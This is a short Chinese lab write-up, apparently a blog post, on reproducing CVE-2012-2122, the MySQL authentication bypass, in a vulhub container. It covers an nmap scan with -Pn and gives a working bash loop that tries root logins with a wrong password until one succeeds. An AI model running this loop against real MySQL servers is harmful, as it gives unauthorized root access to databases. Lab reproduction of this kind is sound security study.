1.原理

参考：CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说，除了配置上的问题以外，是密码的验证出现了漏洞，导致尝试次数多了之后直接可以登入
使用：kali+vulhub

2.复现

开一下镜像，用的是vulhub，不了解的可以自己搜一下，网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口，看看是否正常打开了，发现有3306

用主机的nmap试了下扫描，直接扫端口是扫不到的，因为虚拟机开了防火墙，要-Pn，禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done（前面让你看的自己ip）

最后记得停止使用容器防止后续其他容器的打开
docker ps   展示所有正在使用的容器
docker stop +容器的id   关闭容器